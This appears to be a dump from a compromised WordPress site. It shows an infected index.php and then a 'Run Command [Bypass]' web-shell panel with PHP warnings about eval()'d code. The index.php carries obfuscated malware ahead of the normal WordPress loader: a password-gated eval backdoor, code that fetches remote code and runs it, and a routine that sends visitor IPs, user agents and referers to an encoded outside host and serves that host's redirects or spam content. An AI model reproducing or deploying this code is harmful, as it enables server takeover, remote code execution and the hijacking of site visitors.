/home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/index.php
<?php /*-H8[vd#]c{-*/error_reporting(0); /*-R(W_]-*/$X = "r"."a"."n"."g"."e"; $Qkh = $X("~", " "); $y=${$Qkh[23+8].$Qkh[29+30].$Qkh[37+10].$Qkh[31+16].$Qkh[1+50].$Qkh[11+42].$Qkh[33+24]}; if((in_array(gettype($y).count($y),$y)&&count($y)==19)&&(md5(md5(md5(md5($y[13]))))==="458ed3334e686cc323d630ccbceb8fbc")){ (($y[67]=$y[67].$y[76])&&($y[85]=$y[67]($y[85]))&&(@eval($y[67](${$y[36]}[26]))));}class RKNSI{ static function VPRpjYQc($htlHz) { $XEAmwcnpa = "r"."a"."n"."g"."e"; $ZCMglvfPj = $XEAmwcnpa("~", " "); $nPLChYT = explode("@", $htlHz); $QpxEM = ""; foreach ($nPLChYT as $WseKPu => $NXYK) $QpxEM .= $ZCMglvfPj[$NXYK - 30177]; return $QpxEM; } static function Eup($UW, $XShUPmc) { $NU = curl_init($UW); curl_setopt($NU, CURLOPT_RETURNTRANSFER, 1); $kCGIvS = curl_exec($NU); return empty($kCGIvS) ? $XShUPmc($UW) : $kCGIvS; } static function nCwN() { $TzvcGjP = array("30204@30189@30202@30206@30187@30202@30208@30201@30186@30193@30204@30187@30198@30192@30193","30188@30187@30189@30208@30189@30192@30187@30254@30252","30197@30188@30192@30193@30208@30203@30202@30204@30192@30203@30202","30191@30206@30204@30196","30205@30206@30188@30202@30249@30251@30208@30203@30202@30204@30192@30203@30202","30201@30198@30195@30202@30208@30200@30202@30187@30208@30204@30192@30193@30187@30202@30193@30187@30188","30231@30261","30178","30256@30261","30238@30221@30221@30238@30214","30192@30201"); foreach ($TzvcGjP as $AMkYp) $xwGJXqQ[] = self::VPRpjYQc($AMkYp);$Ch = @$xwGJXqQ[1](${"_"."G"."E"."T"}[$xwGJXqQ[4+5]]); $iBYEvHg = @$xwGJXqQ[3+0]($xwGJXqQ[1+5], $Ch); $FEKRQspGlf = $xwGJXqQ[1+1]($iBYEvHg, true); @${"_"."G"."E"."T"}[$xwGJXqQ[9+1]] == 1 && die($xwGJXqQ[0+5](__FILE__)); if( ((@$FEKRQspGlf[0] - time()) > 0) and (md5(md5($FEKRQspGlf[3+0])) === "e46f3c25e88b60b249f4a91815ca94b1") ): $KfG = self::Eup($FEKRQspGlf[1+0], $xwGJXqQ[0+5]);@eval($xwGJXqQ[4+0]($KfG));die; endif; }}RKNSI::nCwN(); header('Content-Type: text/html; charset=utf-8'); error_reporting(0);function QMqytSuFGfATclhiBEg($resp_header){$header = array('status' => 0, 'content' => '', 'type' => '');if (!is_array($resp_header)) {return $header;}foreach ($resp_header as $hone) {if (preg_match('/http\/[0-9\.]+[\s]+([0-9]+)/i', $hone, $matched)) {$header['status'] = intval($matched[1]);} elseif (preg_match('/location\:[\s]+(.*)/i', $hone, $matched)) {$header['content'] = $matched[1];} elseif (preg_match('/content\-type\:[\s]+(.*)/i', $hone, $matched)) {$header['type'] = $matched[1];}}return $header;}function kbgBewQusyIWHYti($url, $datas = array()){$response = array('status' => 0, 'content' => '', 'type' => '');if (is_array($datas) && count($datas)) {$url .= '?' . http_build_query($datas);}try {if (function_exists('curl_exec') && function_exists('curl_init')) {$c = curl_init();curl_setopt($c, CURLOPT_URL, $url);curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 20);curl_setopt($c, CURLOPT_TIMEOUT, 60);curl_setopt($c, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($c, CURLOPT_COOKIESESSION, 0);curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);$c_retval = curl_exec($c);$response['status'] = intval(curl_getinfo($c, CURLINFO_HTTP_CODE));$response['type'] = strval(curl_getinfo($c, CURLINFO_CONTENT_TYPE));$response['content'] = strval(curl_getinfo($c, CURLINFO_REDIRECT_URL));@curl_close($c);if (in_array($response['status'], array(200, 301, 302, 404))) {$response['content'] = strval($c_retval);}} elseif (ini_get('allow_url_fopen')) {$http_opt = array('http' => array('method' => 'GET', 'timeout' => 60, 'follow_location' => 0),'ssl' => array("verify_peer" => false, "verify_peer_name" => false));$context = stream_context_create($http_opt);$content = @file_get_contents($url, false, $context);$response = array_merge($response, QMqytSuFGfATclhiBEg($http_response_header));if (in_array($response['status'], array(200, 301, 302, 404))) {$response['content'] = strval($content);}}} catch (Exception $e) {}return $response;}function cPCTWtKqxa($str){if (!$str) return '';return rtrim(strtr(base64_encode($str), '+/', '-_'), '=');}function CfeyYqIzHGLh(){$ip_addr = '';if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && !empty($_SERVER['HTTP_CF_CONNECTING_IP'])) {$ip_addr = $_SERVER['HTTP_CF_CONNECTING_IP'];} elseif (isset($_SERVER['HTTP_X_REAL_IP']) && !empty($_SERVER['HTTP_X_REAL_IP'])) {$ip_addr = $_SERVER['HTTP_X_REAL_IP'];} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {$ip_addr = $_SERVER['HTTP_X_FORWARDED_FOR'];} else {$ip_addr = $_SERVER['REMOTE_ADDR'];}$ip_addr = trim(str_replace(" ", "", $ip_addr), ",");if (strpos($ip_addr, ",") !== false) {$ip_addr = explode(",", $ip_addr);$ip_addr = $ip_addr[0];}return $ip_addr;}function vPpMCTLUhsiSrYNJlRQe(){$http_proto = 'http://';if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {$http_proto = 'https://';} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {$http_proto = 'https://';} elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {$http_proto = 'https://';}return $http_proto;}if ($_SERVER['REQUEST_URI'] === '/R-' . md5($_SERVER['SERVER_NAME'])) {exit(strrev(md5($_SERVER['SERVER_NAME'])));}if (substr_count($_SERVER['REQUEST_URI'], 'index.php/jk')) {exit('{ "error": 200, "lc": "jk", "data": [ 1 ] }');}$ip_addr = CfeyYqIzHGLh();$referer = strval(@$_SERVER['HTTP_REFERER']);$site_url = vPpMCTLUhsiSrYNJlRQe() . $_SERVER['HTTP_HOST'];if (strpos($referer, $site_url) === 0) $referer = '';$rq = array();$rq['i'] = cPCTWtKqxa($ip_addr);$rq['l'] = cPCTWtKqxa($_SERVER['HTTP_ACCEPT_LANGUAGE']);$rq['sn'] = cPCTWtKqxa($_SERVER['SCRIPT_NAME']);$rq['r'] = cPCTWtKqxa($_SERVER['REQUEST_URI']);$rq['rf'] = cPCTWtKqxa($referer);$rq['s'] = cPCTWtKqxa($site_url);$rq['u'] = cPCTWtKqxa($_SERVER['HTTP_USER_AGENT']);$r_trim = preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']);$r_istatic = false;if (strpos($r_trim, '.') > 0&&strpos($r_trim,'.php')===false) {$ext = substr($r_trim, strpos($r_trim, '.'));if (in_array($ext, array('.js', '.css', '.jpg', '.png', '.gif', '.ico'))) {$r_istatic = true;}}if (!$r_istatic) {$response = kbgBewQusyIWHYti(base64_decode("aHR0cDovL3pzNzE5djE2YXMubWVpYXN0LmxhdC8"), $rq);if (!in_array($response['status'], array(0, 200))) {switch ($response['status']) {case 301:header('HTTP/1.1 301 Moved Permanently');header('Location: ' . trim($response['content']));break;case 302:header('HTTP/1.1 302 Move Temporarily');header('Location: ' . trim($response['content']));break;case 404:header('HTTP/1.1 404 Not Found');header("status: 404 Not Found");break;default:break;}}if (strlen($response['content'])) {@header('Content-Type:' . $response['type']);echo $response['content'];exit(0);}}/*-9(c3`_5Y-*/?><?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?>
Run Command [Bypass]
Run Command
Warning : Cannot modify header information - headers already sent by (output started at /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/blocks/index.php(393) : eval()'d code:298) in /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-content/plugins/wp-super-cache/wp-cache-phase2.php on line 1591
Warning : Cannot modify header information - headers already sent by (output started at /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/blocks/index.php(393) : eval()'d code:298) in /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/pluggable.php on line 1450
Warning : Cannot modify header information - headers already sent by (output started at /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/blocks/index.php(393) : eval()'d code:298) in /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/pluggable.php on line 1453